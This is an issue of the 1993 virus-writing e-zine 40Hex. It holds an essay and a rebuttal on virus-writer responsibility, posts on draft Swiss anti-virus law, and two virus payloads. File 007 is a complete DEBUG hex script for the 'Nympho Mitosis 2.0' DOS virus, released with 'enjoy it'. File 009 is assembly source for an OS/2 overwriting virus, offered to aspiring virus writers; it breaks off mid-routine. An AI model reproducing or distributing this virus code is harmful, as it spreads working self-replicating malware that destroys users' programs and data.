40Hex Number 12 Volume 3 Issue 3
40Hex Number 12 Volume 3 Issue 3 File 006
This article is being written for 40-hex, because I believe
communication is the key to helping computing obtain its maximum
potential. I do not agree with all of the philosophies of many virus
writers. This article does not endorse the views of anyone other than
myself :), and does not endorse any other material that will appear in
this or any other issue of 40-hex. Many of the ideas expressed in this
article appeared in one of my submissions to Computer Underground
Digest. I'm writing this because I've had some good honest conversations
with some of the Phalcon/Skism people, and I appreciate them listening
to my views (even though they don't agree with them all).
Again, I am not going to get into this "not all viruses are meant to be
destructive, not everyone who calls a virus exchange BBS will use
viruses for evil purposes, some anti-virus product developers lie to
scare the users" business. I agree with all of this, and if you don't,
then you will have to find that out for yourself. Virus writers already
know this is true. If you are not a virus writer, and really don't know
what is going on, and are reading this magazine thinking that we need
laws to shut these guys down, you should do some investigation on your
own and find out what is really going on in the virus arena. These
arguments only cloud the issues, and the issue here is "What is going
on?". I can't tell you everything that is going on because I don't know,
but I tell you this much: Something's happening here....What it is ain't
exactly clear...
Computer viruses are programs but they are also more than 'just
programs'. I did an in-depth study of virus exchange BBS and found that
the viruses themselves did not have a signifant impact on the users. It
was more a case of certain attitudes having impact, and of the
(necessary) reaction on the part of security personnel and a-v product
developers having impact. By necessary action, I mean that each time a
virus writer releases a virus to a virus exchange BBS (losing control
over it) or releases it code in a magazine, people get scared.
Developers then have to put detection for that virus in their scanners.
Updates cost money. Some of this has changed since my study. More
viruses are being found in the wild. Some of this is due to their
intentional release, their availability on virus exchange BBS. Still,
the majority of the problem is not the distribution of the viruses but
the fostering of some of the attitudes. On the positive side, we see
some people finally calling for "responsible" action. Only time will
tell how long it lasts. To me, the P/S E-Mail virus site was a very bad
choice on the part of the administrators and I am glad it is gone.
Still, it was better than some situations which actively encourage using
viruses to cause damage. We don't yet live in that ideal world where we
can trust other people to act nice.
People want to say they can't help what someone else does with a virus
if they give it to them, but by exercising some common sense and
responsibility, they -can- help. It's not so much to ask considering the
future of cyberspace and it's freedoms are at stake here. If people keep
going like they are now, soon we will have laws that say we CANNOT give
certain code to anyone. Don't believe it? Read on.
When I talked about laws in the Fido Virus echos, virus writers told me
there is NO way there will be any laws against virus exchange BBS,
anywhere, ever. Free Speech. WRONG. Do you think I just pull this stuff
out of thin air?
It's not illegal to have such BBS in America. Not yet. They are illegal
in other countries. Specifically, the Dutch law (art.350a (3), 350b (2)
Sr.) addresses the distribution of computer viruses. "Any person who
intentionally or unlawfully makes available or distributes any
information (data) which is meant tto do damage by replicating itself in
an automated system shall be liable to a term of imprisonment not
exceeding four years or a fine of 100,000 guilders."
In Sweden, it's starting to sound more like this:
Anyone, who, without authorization - erases, modifies, or destructs
electronically or similarly saved or data, or anyone who, creates,
promotes, offers, makes available, or circulates in any way means
destined for unauthorized deletion, modification, or destruction of such
data, will, if a complaint is filed, receive imprisonment for up to
three years, a fine, or if there is considerable damage, five years
sentence.
Is that clear enough? It is against the law in Holland to INTENTIONALLY
(i.e. on purpose, i.e. if you put it online, you knew you put it there)
to make available ANY data (program) that can do damage..specifically a
replicating program. That means virus. And don't forget that magic word,
"extradition". The Swiss laws are in draft stage.
Now, a lot of virus writers say they can't be held responsible for a
virus doing damage if they don't mean for it to escape, or if someone
else uses it. Wrong again. The law of negligence allows victims of
accidental injury to sue to obtain compensation for losses caused by
another's negligence. But, it's even more applicable if you consider the
aspect of torts. You can have what is called an intentional tort (which
is what lawyers use to refer to suits that try to get dollars for
damages, such as libel, fraud). In these kinds of cases, you may think
just because you didn't mean for your virus to 'escape' you are not
legally responsible (forgetting about ethics for a minute. A lot of
virus writers seem to think if its not illegal to do xyz, xyz is
therefore ok to do. So lets put ethics aside and look at legalities).
You are indeed legally responsible because all that is necessary to
establish intentional torts is that you -intended- to do the act (write
the virus) that caused the harm. The law of negligence allows victims of
accidental injuries to sue for compensation due to negligence. This of
course refers to U.S. law, and is not in any way a complete reference,
but you can get the general idea. You don't just have free rein.
But, the law is not the solution, in my opinion. However, you can force
it to become the solution if you do not take responsibility for your
actions. If you keep making these viruses available indiscrimately, you
are creating LAWS, just as surely as if you had written the law with
your own hand.
Stop to think for a moment of the implications of this. The Dutch
enacted laws as the abuse of computerized equipment increased. While
some laws already existed that addressed computer crime, it became clear
that some intentional damage was being done that was slipping through
the loopholes in the law. Something must be going on that caused them to
react so strongly, to specifically include virus exchange bulletin
boards in this legislation. What was going on? Malicious damage.
Incitement. Actions that helped people to do damage. What is this
"incitement"?
Incitement. That is a term that is getting a lot of publicity now, with
Mike Elansky held on $500,000 bail for distributing a text file on his
BBS. The file contained the following text:
! Note to Law-enforcement type people: ! ! This file is intended
to promote ! ! general havoc and *ANARCHY*, and ! ! since your
going to be the first ! ! assholes up against the wall.. there ! !
isnt a damn thing you can do about ! ! it, pigs!
!
It may be distasteful to some people, but the kind of information
included in the file was the same 'anarchy' type information you can get
at your local library. Does it merit a young man being locked up with an
almost impossible bail? It's no worse than a lot of the graffitti you
can find in Manhattan, or LA, and it's no worse than you can hear on a
lot of albums. To me personally, it's just silliness. I know the fellow
who wrote the file, and I don't find him to be a threatening anarchist.
He's a fine person, who wrote the above as a parody-spoof. It is not
much different than the things you hear in the halls at most high
schools these days. I'm not saying it's a desireable manner of
expressing dissatisfaciton with the system, but its *NOT* the devil
incarnate.
Someone had it on their BBS, someone downloaded it, and now, the BBS
sysop is in jail for it. Something's happening here...
Fear. People are afraid. They are chasing the shadowy ghost, and imagine
it is 'the virus writer' or 'the hacker'. Well, virus writers and
hackers may do some of these things, but the majority of them do not.
the publicity. Why? Because they want it. And, what happens when they
want it, and get it? More fear. The real ghost is ignorance and fear,
not the virus writer or hacker. On the other hand there ARE some very
malicious people out there. And, maybe to protect people from them, we
will need laws. The way it stands right now, no one knows who is
malicious and who is not because everyone is hiding behind the "law".
This will change, very soon, if people do not stop thinking they can
just do whatever they like because its "legal". Laws are established
when new situations come about, and some people are pushing the envelope
here.
One thing that is happening is that people are afraid to say something
is wrong. We all have to stop being afraid to say something is WRONG. It
is WRONG to destroy or damage data of other people.
It's WRONG to encourage people to do it. and, if you can't figure out
what encourages people, then you had better figure it out soon, because
we don't have much time left.
I say you better figure it out fast because right now, people are up in
arms about computer viruses. They have every right in the world to
expect they shouldn't have to be on guard against any 'toys' that happen
to escape. They certainly deserve to be protected from people who
malicious release, or -irresponsibly release- viruses. They should not
have to learn every in and out of DOS to protect themselves. For most
people, computers are work. They are not just hack-o-matik machines
waiting to be explored. No one has the right to destroy other people's
information. Just like we don't want the government or other people to
just do whatever they feel like with -our- information, we have to
respect other people's rights to -their- information.
It isn't working. There are still people who are doing malicious things
with viruses. In talking with a lot of virus writers, I've pretty much
gotten the same story. After a while, it's just not fun to do it
anymore, and they evolve into learning more about code in general. They
no longer upload it to unsuspecting people. Most of them don't even use
virus exchange BBS, because there is just not any point. You can only
get excited over FF/FN so many times, and sooner or later you move on to
other things. But there is still a problem. Newcomers to the virus scene
pass thru the same stages; they release their viruses either through
incompetence or purposeful maliciousness, to 'prove' themselves. It's
almost like a rite of passage.
It is this group, the intentionally malicious, that are drawing all of
the attention. It is this group that forced the hand of the Dutch
government. It is this group, malicious virus writers and hackers that
are drawing the attention of the the Legislators and Judiciary in the
United States, Canada, and now Switzerland.
Consider that we are living in a truly global society. The laws cannot
forever be bound by traditional territorial borders. Think of the
implications for the future. Being held hostage by one's freedoms tends
to make one rethink their "Rights". -------
--
SGordon@Dockmaster.ncsc.mil / vfr@netcom.com bbs: 219-273-2431
fidonet 1:227/190 / virnet 9:10/0 p.o. box 11417 south bend, in 46624
*if you don't expect too much from me then you might not be let down*
----
I originally had a huge response for this, but I found that a
majority of my arguments were more aimed at the point of view she was
explaining, rather then her viewpoint. The bottom line is, laws that
regulate information are horrible. If it happens, it is unenforcible.
I do not believe that virus writers should be 'nice', or politically
correct, and I dont ever plan on removing virus source from 40Hex.
Another problem with her article is the part about virus writers doing
whatever they like just because it is 'legal'. The point is, because
it IS legal, we can write viruses. People also break the law and
distribute viruses. It is NOT wrong to write a virus. By any morality.
It is wrong to use it on someone else's computer illegally. For the
most part I agree with Sara Gordon. Before you go about saying she is a
narc, and she did this, and she did that, just ask yourself what have
you done about virus legislation. If it is equal to zero, zilch, nada,
etc., then you should at least give her the credit of doing something to
help the underground, despite the rumors. I don't care whether you
trust Sara Gordon, but realize that in this issue she is definately
fighting the legislation.
40Hex Number 12 Volume 3 Issue 3 File 007
This is the latest virus from our newest member Memory Lapse. This
time, we aren't going to tell you what it does, so, enjoy it. It is
called Nympho Mitosis 2.0.
->Gheap
------------------------------------
n nympho20.com
e 0100 BD 00 00 48 CD 21 BB 4D 5A 74 53 1E 06 33 FF 8C
e 0110 C0 48 8E D8 38 3D 75 44 88 1D 83 6D 03 44 83 6D
e 0120 12 44 8B 45 12 8E D8 40 8E C0 88 3D C7 45 01 08
e 0130 00 C7 45 03 43 00 0E 1F 8D B6 00 01 81 F7 00 01
e 0140 B9 94 01 F3 A5 B8 89 01 8E D9 87 06 84 00 26 A3
e 0150 BC 01 8C C0 87 06 86 00 26 A3 BE 01 07 1F 8D B6
e 0160 FB 03 2E 3B 1C 74 13 86 FB 2E 2B 1C 74 0C BF 00
e 0170 01 57 C6 05 C3 FF D7 A4 A5 C3 8C C0 05 10 00 2E
e 0180 03 44 16 50 2E FF 74 14 CB 3D FF FF 75 02 40 CF
e 0190 80 FC 4E 74 33 80 FC 4F 74 2E 80 FC 11 74 56 80
e 01A0 FC 12 74 51 06 1E 60 33 ED 3D 00 6C 74 12 80 FC
e 01B0 3D 74 0F 2D 00 4B 74 0D 61 1F 07 EA 00 00 00 00
e 01C0 87 D6 E9 C2 00 E9 20 01 E8 2A 02 72 25 60 06 B4
e 01D0 2F CD 21 26 8B 47 16 26 8B 4F 18 25 1F 00 83 E1
e 01E0 1F 49 33 C1 75 0A 26 81 6F 1A 13 03 26 19 47 1C
e 01F0 07 61 CA 02 00 E8 FD 01 84 C0 75 3F 60 06 B4 51
e 0200 CD 21 8E C3 26 2B 1E 16 00 75 2E 8B DA 8A 07 50
e 0210 B4 2F CD 21 58 FE C0 75 03 83 C3 07 26 8B 47 17
e 0220 26 8B 4F 19 25 1F 00 83 E1 1F 49 33 C1 75 0A 26
e 0230 81 6F 1D 13 03 26 19 47 1F 07 61 CF 5B 4E 79 6D
e 0240 70 68 6F 20 4D 69 74 6F 73 69 73 5D 20 76 32 2E
e 0250 30 00 43 6F 70 79 72 69 67 68 74 20 28 63 29 20
e 0260 31 39 39 33 20 4D 65 6D 6F 72 79 20 4C 61 70 73
e 0270 65 00 50 68 61 6C 63 6F 6E 2F 53 6B 69 73 6D 20
e 0280 43 61 6E 61 64 61 00 E8 30 01 26 8B 45 0D 26 8B
e 0290 4D 0F 25 1F 00 83 E1 1F 49 2B C1 75 48 E8 44 01
e 02A0 52 50 2D 18 00 1B D5 26 89 45 15 26 89 55 17 B4
e 02B0 3F B9 18 00 BA 13 04 CD 21 E8 1F 01 B4 40 CD 21
e 02C0 58 5A 2D 13 03 1B D5 26 89 45 15 26 89 55 17 B4
e 02D0 40 8B CD CD 21 26 8B 4D 0D 26 8B 55 0F 80 E1 E0
e 02E0 FE C1 E9 C9 00 E9 CB 00 E8 CF 00 26 8B 45 0D 26
e 02F0 8B 4D 0F 25 1F 00 83 E1 1F 49 33 C1 74 32 B4 3F
e 0300 B9 18 00 BA FB 03 CD 21 B8 4D 5A BE 13 04 8B 16
e 0310 FB 03 3B C2 74 1D 86 E0 2B C2 74 17 E8 C5 00 A3
e 0320 01 01 B9 03 00 2B C1 C6 04 E9 89 44 01 51 EB 57
e 0330 E9 80 00 26 8B 45 20 3D 54 42 74 F4 3D 46 2D 74
e 0340 EF 3D 53 43 74 EA 2D 43 4C 74 E5 E8 8D 00 B4 3F
e 0350 51 8B D6 CD 21 E8 8C 00 52 50 05 13 03 13 D5 B9
e 0360 00 02 F7 F1 0B D2 74 01 40 89 54 02 89 44 04 58
e 0370 5A B9 10 00 F7 F1 2B 44 08 89 54 14 89 44 16 81
e 0380 EA 00 01 89 16 01 01 B4 40 B9 13 03 BA 00 01 CD
e 0390 21 E8 47 00 B4 40 59 8B D6 CD 21 26 8B 4D 0D 26
e 03A0 8B 55 0F 52 83 E1 E0 83 E2 1F 4A 0B CA 5A B8 01
e 03B0 57 CD 21 B4 3E CD 21 E9 FE FD B8 00 3D E8 35 00
e 03C0 93 53 0E 0E 1F 07 B8 20 12 CD 2F B8 16 12 26 8A
e 03D0 1D CD 2F 5B 26 C7 45 02 02 00 C3 26 89 6D 15 26
e 03E0 89 6D 17 C3 1E 26 C5 45 11 8C DA 26 89 45 15 26
e 03F0 89 55 17 1F C3 9C 0E E8 C1 FD C3 CD 20 02 00 04
e 0400 00 06 00 08 00 0A 00 0C 00 0E 00 10 00 12 00 14
e 0410 00 16 00
rcx
0313
w
q
------------------------------------------------------
40Hex Number 12 Volume 3 Issue 3 File 008
Article #1
----------
Subj: Draft Swiss AntiVirus regulation
To whom it may concern:
The Swiss Federal Agency for Informatics (Bundesamt fuer Informatik, Bern) is
preparing a legislative act against distribution of malicious code, such
as viruses, via VxBBS etc. You may know that there have been several attempts
to regulate the development and distribution of malicious software, in UK, USA
and other countries, but so far, Virus Exchange BBS seem to survive even in
countries with regulations and (some) knowledgeable crime investigators.
In order to optimize the input into the Swiss legal discussion, I suggested
that their draft be internationally distributed, for comments and suggestions
from technical and legal experts in this area. Mr. Claudio G. Frigerio from
Bern kindly translated the (Swiss) text into English (see appended text, both
in German and English); in case of any misunderstanding, the German text is the
legally relevant one! Any discussion on this forum is helpful; please send
your comments (Cc:) also to Mr. Claudio G. Frigerio (as he's not on this list).
"The Messenger" (Klaus Brunnstein: October 9, 1993)
###############################################################
Appendix 1:
Entwurf zu Art. 144 Abs. 2 des Schweizerischen Strafgesetzbuches
"Wer unbefugt elektronisch oder in vergleichbarer
Weise gespeicherte oder uebermittelte Daten loescht,
veraendert oder unbrauchbar macht, oder Mittel, die
zum unbefugten Loeschen, Aendern oder Unbrauchbarmachen
solcher Daten bestimmt sind, herstellt oder anpreist,
anbietet, zugaenglich macht oder sonstwie in Verkehr
bringt, wird, auf Antrag, mit der gleichen Strafe belegt."
P.S.: gleiche Strafe =JBusse oder Gefaengnis bis zu 3 Jahren;
bei grossem Schaden, bis zu 5 Jahren Gefaengnis sowie Verfolgung
von Amtes wegen (Offizialdelikt)
###############################################################
Draft of article 144 paragraph 2 of the Swiss Penal Code
(English translation)
"Anyone, who, without authorization
- erases, modifies, or destructs
electronically or similarly saved or data,
or anyone who,
- creates, promotes, offers, makes available, or circulates in
any way
means destined for unauthorized deletion, modification, or
destruction of such data,
will, if a complaint is filed, receive the same punishment."
P.S.: same punishment =Jfine or imprisonment for a term of up to
three years; in cases of a considerable dam-age, five years with
prosecution ex officio
###############################################################
Author: Claudio G. Frigerio, Attorney-At-Law
Swiss Federal Office of Information Technology and System,
e-mail: bfi@ezinfo.vmsmail.ethz.ch
###############################################################
Article 2:
---------
Subj: More about Swiss Anti-Virus Laws
Thanks to everybody who replied on the subject of Swiss Anti-Virus Legis-
lation.
As somebody noticed there was a word missing in the English translation. It
should have been: "... destructs electronically or similarly saved or TRANS-
MITTED data will..."
The text posted to the net, was a trial to include into the "data damaging"
even creation and dealing/circulating computer viruses. The idea behind this,
is that the virus itself already carries the malicious intent of his author.
Therefore it is dangerous in any circumstance. Actually a virus can not be
abused, as the idea of abuse includes the possibility, that a virus can be
used in a good way too. As I have been told by specialists, there is no such
"good use" of a virus as any unauthorized change of data has the potential of
interfering with other data and/or programs in environments, that the virus
author did/could not foresee. And even the unauthorized use of storage space
is a damage, as this space will not be available for authorized uses of the
computer system. Computer virus are an "absolute danger", and as any other
dangerous thing (like explosive, poison, radioactiv materials or genetic
materials in specialized labs) computer virus should not be created or
circulated without restrictions.
It has been remarked that in the text there was no word about the requisite
intent or requisite knowledge of the committer. This way any BBS sysop would
always risk criminal charges, if his BBS carries any virus infected software
but the sysop isn't aware of it.
I apologize for not having told that Swiss Penal Law only considers inten-
tional crimes, if there is no explicit indication that negligent acts are
punished too. Therefore according to Swiss Penal Law terminology and system,
the text posted to the net only considers who "knowingly and willingly"
commits the act. That means that the author of the virus has to know it was
a virus, what he created: this is always the case. And who circulates the
virus has to know it was a virus and he wanted to circulate it. The know-
ledge that SW was or carried a virus can be proved easily by the fact that
nobody knowingly stores viruses without labeling or marking them in any way,
in order not to be infected himself (yes, I know: if there really is somebody
so foolish, I have to find another way to prove his knowledge). For BBS a
"Virus Directory" containing viruses or virus source codes is evidence enough
for the "requisite knowledge and intent". The law does no want to punish
accidental distribution of viruses.
The phrase "means destined for unauthorized deletion" has been considered
unclear. "Means" certainly includes not only software, but source code (on
paper as on disks) too. It has been remarked that it's the classical tool-
maker problem: a knife can be used as woodcarver to make a great work, but
it might be used aven as a thug to commit murder.
I realized this problem, but would you consider a knife as generally
destined to commit murder? Or would you consider explosive as generally
destined to create damage? We have to be aware that most items can be used
in a legal or abused in an illegal way. Seldom an item can only be used in
an illegal way, but computer viruses are such items! I do not speak about
software using virus specific reproduction techniques (like "killer viruses"
for copyright enforcement or "anti-viruses" supposed to fight viruses) that
make data changes with the explicit (contract/license) or implicit (highly
probable agreement of the user) authorization of the user. This kind of SW
is actually not included in the definition of "means destined for unatho-
rized deletion, modification, or destruction of data".
Therefore you cannot say that Norton Utilities, WipeFile or any other
similar general purpose SW or utilities are "destined for unautorized
deletion, modification or destruction", although they certainly could be
used for this.
The text doesn't say anything about malice, malicious intents or the intent
to damage, as these elements are very difficult to prove in trial, if the
accused denies any such intention. Actually I considered these subjective
elements as not really necessary, as the virus already carries the malicious
intent of its author: the malice of the author is proved by his virus, and
the malice of somebody circulating the virus is proved, if his knowledge,
that he was circulating a virus, is proved.
According to general principles of penal law the site of crime is the main
link to charge somebody. If a virus has been created or circulated outside
the national borders of Switzerland, Swiss Penal law cannot be applied. But
if a virus created outside Switzerland is transferred electronically to
Switzerland, the downloader will be held responsible, no matter if he was
in Switzerland or abroad, as "importing" as a way to circulate the virus.
The "success" of the act will take place in Switzerland. Anyway Art. 7 of
Swiss Penal Law follows the principle of territoriality and the
"Ubiquitaetsprinzip" (sorry: didn't find the correct English word: an act
is considered being committed not only where the committer was, when he
started his crime, but also where the "success" has been realized. Anyway
I do consider clearifing this by inserting that "importing" virus is
considered as "circulating in any way".
As this crime is prosecuted as soon as police or prosecution authority knows
about it (so called "ex officio", there is no need for a specific complaint:
a detailed information about a fact is enough to start investigations, no
matter where the information came from (e.g. abroad).
There is no doubt, that professional ant-virus specialists and scientists
should have access to viruses and be allowed to even create viruses. As
long as this is covered by the aim of studying strategies to fight
computer viruses, this is OK. I actually planned a system of registrering
these people with a federal authority (e.g. the IS Security Dptm. at the
Swiss Federal Office of Information Technology and Systems or the Ministery
of Justice). The posted text would be then need to be completed as follows:
"Who, without being registered with the proper federal authority, creates...
Only trustworthy individuals, who are professionally or scientifically
active in combatting such means, may be registered on demand."
The Swiss legislator is actually not only considering "data damaging" but
"hacking", "time theft" and computer fraud too, but these ARE NOT subjects
of the discussion in this forum now. The same applies to software piracy,
already ruled by another law. I will gladly email/fax the German, French or
Italian text of the Penal Law draft to anybody interested. Please do not
ask me an English translation of these, as I am not a professional English
translator of legal text.
I am aware that the UK and Italy have/are going to have laws allowing to
prosecute the creation and circulation of computer viruses. If anybody
knows of other contries, may he please let me know in any way and as soon
as possible.
On Monday, 25 October 1993, there will a meeting with the Ministery of
Justice in order to convince them to propose this to the Parliament. This
will be very very difficult, as there generally is very little knowledge
on, or concern for the threat through computer viruses. Most people have
simply never suffered an attack of computer viruses.
Thanks again for following this item with your comments.
Claudio G. Frigerio
P.S.: Please do not suggest to me to send them a floppy with a ..... just
to make them more aware of the risks...
P.P.S.: You can phone/email/fax/write to me in Italian, German, French,
Spanish or English.
Article #3
----------
Subj: Detection complexity of some newish viruses. (PC)
A while back (January 93) a few people posted sizes of their algorithmic
virus detectors. Here are the line counts for a couple more detectors
included (or to be included) in IBM AntiVirus.
These counts are for lines of C; the code is not particularly dense.
The SatanBug (*) count includes some tables. (File I/O handling is
*not* included in these counts. The lines-of-code counter is a standard
counter used in many IBM development projects. I'm not completely sure
what rules this lines-of-code counter uses. Some lines are
counted as both code and comment lines.)
SatanBug ::= 421 physical lines, 173 comment lines, and 187 code lines
Tremor ::= 165 physical lines, 36 comment lines, and 107 code lines
(*) There is some disagreement about the name of this virus.
Bill Arnold, barnold@watson.ibm.com (IBM AntiVirus Development)
Article 4:
----------
Subj: Electronic Warfare
The October 18th issue of Aviation Week has an interesting item in its
Washington Outlook column on future developments in electronic warfare.
Paraphrase follows:
A Pentagon official, H. Steven Kimmel, deputy director of C3I testing
and evaluation in the Pentagon acquisition office, said the next
developments in "non-lethal electronic combat" should be on methods
of injecting deceptive information and computer viruses into enemy
command, control, communication and intelligence systems and into
enemy communication nodes and data bases. Kimmel was speaking to the
Association of Old Crows, a group of electronic warfare specialists.
He further said that the U.S. needs this "nonlethal capability" both
defensively and offensively. It was pointed out that American C3I
systems are vulnerable because of their many nodes and reliance on
computers and commercial off the shelf components.
Article 5:
----------
Subj: Swiss Anti Virus Law
On November 11, 1993 the Law Committee of the 2nd Chamber of the Parliament
(German: "Staenderat"; a kind of "Swiss Senate") decided to accept the anti-
virus propositions. The Staenderat will probably discuss in Parliament and
decide on the subject by December 1993. In the Law Committee there was
practically no opposition to the law draft; thus it is very likely that the
Staenderat will accept it too. After this the "Nationalrat" (the 1st Chamber of
Parliament, a kind of "Swiss House of Representatives" or "Swiss Congress")
will discuss the draft and decide about it by Spring 1994.
The Swiss law draft, posted to the net, has been changed considerably in the
last few weeks. The draft actually discussed in Parliament will be:
German text:
Schweizerisches Strafgesetzbuch, Artikel 144bis, Datenbeschaedigung
1. Wer unbefugt elektronisch oder in vergleichbarer Weise
gespeicherte oder uebermittelte Daten loescht, veraendert oder
unbraucbar macht, wird, auf Antrag, mit Gefaegnis oder mit Busse
bestraft.
Hat der Taeter einen grossen Schaden verursacht, so kann auf
Zuchthaus bis zu fuenf Jahren erkannt werden. Die Tat wird von
Amtes wegen verfolgt.
2. Wer Programme, von denen er weiss oder annehmen muss, dass sie
zu den in Ziffer 1 genanten Zwecken verwendet werden sollen,
herstellt, einfuehrt, in Verkehr bringt, anpreist, ueberlaesst oder
sonstwie zugaenglich macht oder zu ihrer Herstellung Anleitung gibt,
wird mit Gefaegnis oder mit Busse bestraft.
Handelt der Taeter gewerbsmaessig, so kann auf Zuchthaus bis zu
fuenf Jahren erkannt werden.
English text:
Swiss Criminal Code, Article 144bis, Damaging of data
1. Anyone, who without authorization deletes, modifies or renders
useless electronically or similarly saved or transmitted data, will,
if a complaint is filed, be punished with the imprisonment for a
term of up to 3 years or a fine of up to 40000 Swiss francs.
If the person charged has caused a considerable damage, the
imprisonment will be for a term of up to 5 years. The crime will
be prosecuted ex officio.
2. Anyone, who creates, imports, distributes, promotes, offers,
makes available, circulates in any way, or gives instructions to
create programs, that he/she knows or has to presume to be used
for purposes according to item 1 listed above, will be punished
with the imprisonment for a term of up to 3 years or a fine of up
to 40000 Swiss francs.
If the person charged acted for gain, the imprisonment will be for
a term of up to 5 years.
This English translation may not be perfect. The text will be available by
January 1994 in all official Swiss languages: German, French and Italian.
The protected item of this article are just data (immaterial goods). Any damage
to computer systems, like the burning of floppies, plug-pulling, sledgehammers
etc. are damages to "physical/material things" covered by article 144
(Sachbeschaedigung, damage to property).
According to Swiss penal legislation the requisite knowledge and intent
("knowingly and willingly") have not to be mentioned specifically.
As you may have noticed, the "registration" of IS security pros has been
dropped. The expression "that he/she knows or has to presume to be used for
purposes according to item 1 listed above" will exclude any penal responsibi-
lity if the committer e.g. gave a virus to a professional anti-virus software
developer or is creating viruses for research, as in these and similar special
situations a misuse of the virus is highly unlikely. The committer will not be
prosecuted, if he had reasonable motives, to practically exclude a misuse. On a
retrospective analysis the judge will check if the person who gave a viruses to
somebody else (who misused it to cause damage) could in any way be blamed for
not having foreseen the occurred misuse. If you give a virus to a notorious
anti-virus professional, known for spreading viruses or source codes, or simply
to somebody who does not give a special guarantee for not misusing the virus,
you will be prosecuted. Who just trusted in the promise of a virus-recipient,
that the latter will not misuse it, will be in trouble, if he did not have a
very special additional reason to trust him. The law considers viruses as so
dangerous for the general public, that any act making them available to
somebody else, represents a general risk to the general public. Who invokes an
exception,that an act of making a virus available to somebody else, did not
represent such a risk has to prove it.
This may cause some concern, but law can not foresee any situation. Judges will
have to carefully check if the reasons to give a virus to somebody else, were
good enough to practically exclude any misuse.
Making a newly discovered virus available to McAfee or the Virus Test Center
will not be a crime, as long as the reputation of these recipients is above any
suspicion.
As the draft is now in the Parliament, there is practically no way to change
any thing in this text anymore (by the administration). Now it is up to the
politicians to decide about the subject and to make any additional change.
40Hex Number 12 Volume 3 Issue 3 File 009
This virus was given to us by Arthur Ellis, and is the first piece
of OS/2 virus source that I have ever seen. Although it is only an
overwriting virus, it should definately be helpful for anyone who wants
to write viruses in OS/2.
->GHeap
------------------------------------------------------------------
INCLUDE OS2.INC ; if you don't have OS2.INC, see end of this file
COMMENT *
This simple overwriting virus demonstrates how the OS/2 API functions
are used to search for, open, and infect programs. No extended registers
are used, and the program may be assembled with MASM 5.1 or 6.0, TASM
for OS/2 (from the Borland C++ package), or with IBM Macro Assembler/2.
Link with :link386 /exepack virus,,,c:\os2\doscalls,virus.def
VIRUS.DEF: NAME VIRUS WINDOWCOMPAT
PROTMODE
STACKSIZE 8192
There is minimal error checking (since when do viruses check errors?). A
useful project for a student would be to convert this program to .386p mode.
- Arthur Ellis, 1993
*
PrintIt MACRO string, StrLen
push 1 ; stdout handle
push DS
mov DX, OFFSET string ; string to write
push DX
xor CX,CX ; zero CX
mov CL, [StrLen] ; string length
push CX
push DS
push OFFSET Written ; bytes written variable
call DosWrite ; like int 21/40
ENDM
OpenIt MACRO seg, handle, mode ; SEGMENT, open mode, handle
push seg ; SEGMENT of file name
push BX ; OFFSET of file name
push DS ; SEGMENT of handle
push OFFSET handle ; OFFSET of handle
push DS ; SEGMENT of open action
push OFFSET OpenAction ; OFFSET of open action
push 0 ; file size DWORD
push 0 ; file size DWORD
push 3 ; attributes: hid,r-o,norm
push 1 ; FILE_OPEN
push mode ; OPEN_SHARE_DENYNONE
push 0 ; DWORD 0 (reserved)
push 0 ; DWORD 0 (reserved)
Call DosOpen ; like int 21/3D
ENDM
.286p
STACK SEGMENT PARA STACK 'STACK'
DW 1000h
STACK ENDS
DGROUP GROUP _DATA, STACK
ASSUME CS:_TEXT, DS:DGROUP, SS:DGROUP, ES:DGROUP
_DATA SEGMENT WORD PUBLIC 'DATA'
FileSpec DB '*.EXE', 0
OpenErr DB ' ',13,10,27,'[m'
Hello DB 27,'[2J',27,'[1;36mMy name is '
Infected DB ' --> infected'
CRLF DB 13,10,27,'[m'
Written DW ? ; bytes written
MyHandle DW ? ; virus handle
VicHandle DW ? ; victim handle
OpenAction DW ? ; open result
Buf FileFindBuf <> ; file find structure
MySize DW ? ; virus length
EnvSeg DW ? ; selector for environment
CmdOfs DW ? ; OFFSET of command line
Image DB 2000 dup (?) ; virus image
ImageLen DW ? ; length of virus
DirHandle DW -1 ; directory handle
SrchCount DW 1 ; search count
_DATA ENDS
_TEXT SEGMENT WORD PUBLIC 'CODE'
extrn DOSCLOSE:far, DOSEXIT:far, DOSWRITE:far, DOSGETENV:far
extrn DOSFINDCLOSE:far, DOSFINDFIRST:far, DOSFINDNEXT:far
extrn DOSOPEN:far, DOSREAD:far
main PROC far
start: call GetName ; get the virus filename
OpenIt ES, MyHandle, 40h ; open virus for read
;--------------------------------------------------------------------
;---( Read virus to image buffer )-----------------------------------
;--------------------------------------------------------------------
push MyHandle ; handle for this program
push DS ; buffer for file image
push OFFSET Image
push 2000 ; Could use DosQFileInfo to
; get filesize but this works
push DS
push OFFSET ImageLen ; virus length goes here
call DosRead ; like int 21/3F
;--------------------------------------------------------------------
;---( Find files to infect )-----------------------------------------
;--------------------------------------------------------------------
call FindIt ; find first file
found: or AX, AX ; error?
jz NoErr ; no error
quit: push 1 ; terminate all threads
push 0 ; return code
call DosExit ; like int 21/4C
NoErr: cmp word ptr SrchCount, 0 ; no files found?
jz quit ; none found
PrintIt Buf.findbuf_achname,Buf.findbuf_cchName
; display filename found
;--------------------------------------------------------------------
;---( Write virus )--------------------------------------------------
;--------------------------------------------------------------------
lea BX,Buf.findbuf_achName ; filename OFFSET in BX
OpenIt DS, VicHandle, 42 ; ACCESS_READWRITE|SHAREDENYNONE
or AX,AX ; error?
jz proceed
PrintIt OpenErr, 25 ; error on open
jmp CloseIt
proceed: PrintIt Infected,15 ; add to hit list
mov BX,[VicHandle]
push [VicHandle] ; write to found file
push DS
push OFFSET Image ; string to write
push [ImageLen] ; image length
push DS
push OFFSET Written ; bytes written variable
call DosWrite ; write the virus
CloseIt: push [VicHandle] ; prepare to close
call DosClose ; close file
;--------------------------------------------------------------------
;---( Find next file )-----------------------------------------------
;--------------------------------------------------------------------
push DirHandle ; Directory Handle
push DS ; SEGMENT of buffer
push OFFSET Buf ; OFFSET of buffer
push SIZE Buf ; length of buffer
push DS ; SEGMENT of count
push OFFSET SrchCount ; OFFSET of count
call DosFindNext ; Find next file
; like int 21/4F
jmp found ; infect if found else exit
main ENDP
;--------------------------------------------------------------------
;---( Get virus file name from environment )-------------------------
;--------------------------------------------------------------------
GetName PROC near
push ds
push OFFSET EnvSeg
push ds
push OFFSET CmdOfs
call DosGetEnv ; get seg, ofs of command line
mov ES,EnvSeg ; ES:BX holds command line
mov BX,CmdOfs
xor DI,DI
xor AL,AL
mov CX,-1
cld
scan: repne scasb ; scan for double null
scasb
jne scan ; loop if single null
